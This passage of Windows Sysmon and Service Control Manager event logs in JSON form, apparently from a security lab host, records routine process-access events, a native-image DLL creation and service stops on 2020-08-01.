C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.665","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-0010ED820A00}","TargetProcessId":"4724","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7203,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.978\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00109C860A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.978","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00109C860A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7204,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.978\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00109C860A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.978","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00109C860A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7205,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:00.978\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12F0-5F25-0000-00109C860A00}\r\nTargetProcessId: 4700\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:00.978","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12F0-5F25-0000-00109C860A00}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76870,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7206,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.415\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.415","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76871,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 07:00:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7207,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.556\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.556","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:01.619\r\nProcessGuid: {E2A3D6B1-12F0-5F25-0000-00109C860A00}\r\nProcessId: 4700\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.Runtime.WindowsRuntime.dll\r\nCreationUtcTime: 2020-08-01 07:00:01.619","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:01.619","ProcessGuid":"{E2A3D6B1-12F0-5F25-0000-00109C860A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\125c-0\\System.Runtime.WindowsRuntime.dll","CreationUtcTime":"2020-08-01 07:00:01.619","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.665\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010518B0A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:01.665","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-0010518B0A00}","TargetProcessId":"4660","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:01.665\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-0010518B0A00}\r\nTargetProcessId: 4660\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 